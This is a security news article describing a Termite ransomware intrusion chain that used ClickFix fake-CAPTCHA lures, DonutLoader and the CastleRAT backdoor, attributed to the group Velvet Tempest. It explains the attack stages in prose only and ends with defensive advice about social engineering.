Security researchers recently uncovered a new intrusion chain connected to Termite ransomware activity. The operation relies on social engineering and legitimate Windows tools to infiltrate networks. Instead of exploiting software vulnerabilities, attackers manipulate victims into running malicious commands themselves.
The campaign uses a technique known as ClickFix. This method tricks users into executing commands that silently download malware components. Once attackers gain access, they deploy additional tools that help them explore the network and maintain persistence.
Researchers say the activity highlights how ransomware groups continue refining their attack strategies. Modern intrusions often unfold through several stages before the final ransomware payload appears.
Threat Group Behind the Activity
Investigators linked the campaign to a threat group tracked as Velvet Tempest. Security teams also identify the group under the name DEV-0504. The actors have operated in the ransomware ecosystem for several years.
Researchers associate the group with multiple well-known ransomware families. Previous campaigns involved operations connected to Ryuk, Conti, LockBit, BlackCat, and REvil. The group often works as an affiliate within larger ransomware networks.
During the latest investigation, analysts observed the attackers operating inside a simulated corporate environment. The scenario represented a large organization with thousands of users and endpoints. The operators conducted hands-on keyboard activity while mapping the network and identifying potential targets.
ClickFix Used to Gain Initial Access
The intrusion began with a malvertising campaign that delivered a ClickFix lure. Victims encountered a fake CAPTCHA prompt while browsing the web. The page displayed instructions that appeared to solve a verification step.
Instead of confirming a CAPTCHA, the instructions asked users to paste a command into the Windows Run dialog. When victims executed the command, the system launched a sequence of hidden operations.
The commands relied on built-in Windows utilities. These tools downloaded files and triggered additional scripts without raising immediate alarms. Because the activity uses legitimate system tools, some security products may struggle to detect it early.
Malware Delivery Through DonutLoader
Once attackers gained access, they deployed additional payloads through scripted commands. PowerShell commands downloaded components and compiled .NET payloads directly on the compromised system.
One stage of the attack introduced DonutLoader, a loader commonly used to deliver secondary malware. Through this loader, the attackers installed the CastleRAT backdoor.
CastleRAT provides remote control over infected systems. Attackers can execute commands, collect information, and move laterally across the network. This access allows the operators to expand their presence before launching a final attack.
Researchers also observed Python-based components placed in system directories. These tools helped maintain persistence after system restarts.
Ransomware Stage Not Observed
During the monitored intrusion, researchers did not see the final deployment of Termite ransomware. However, the infrastructure and tools strongly suggest preparation for a ransomware attack.
Threat actors often spend significant time inside a network before launching encryption. They first gather credentials, explore internal systems, and identify valuable data. This preparation allows attackers to maximize the impact of a later ransomware deployment.
Termite ransomware has already been linked to attacks on several organizations. Known incidents include breaches involving SaaS provider Blue Yonder and Australian fertility company Genea.
Social Engineering Continues to Drive Attacks
The ClickFix method reflects a broader shift in cybercrime tactics. Many attackers now rely heavily on social engineering instead of technical exploits.
By persuading users to run commands themselves, criminals bypass some security protections. This approach also reduces the need for complex vulnerability exploits.
Researchers warn that similar techniques will likely appear in future ransomware campaigns. Attackers continue refining social engineering strategies that appear legitimate to victims.
Conclusion
The investigation reveals how modern ransomware campaigns unfold through layered intrusion stages. Activity connected to Termite ransomware demonstrates how attackers combine social engineering with legitimate system tools.
The ClickFix technique allows criminals to gain initial access without exploiting vulnerabilities. Once inside a network, attackers deploy loaders, remote access tools, and persistence mechanisms.
Although the monitored attack stopped before encryption occurred, the infrastructure indicates preparation for a full ransomware operation. Organizations must remain alert to social engineering attacks that encourage users to execute unfamiliar commands.
Improved security awareness and stronger monitoring remain essential defenses against evolving ransomware threats.
0 responses to “Termite Ransomware Linked to ClickFix and CastleRAT Attacks”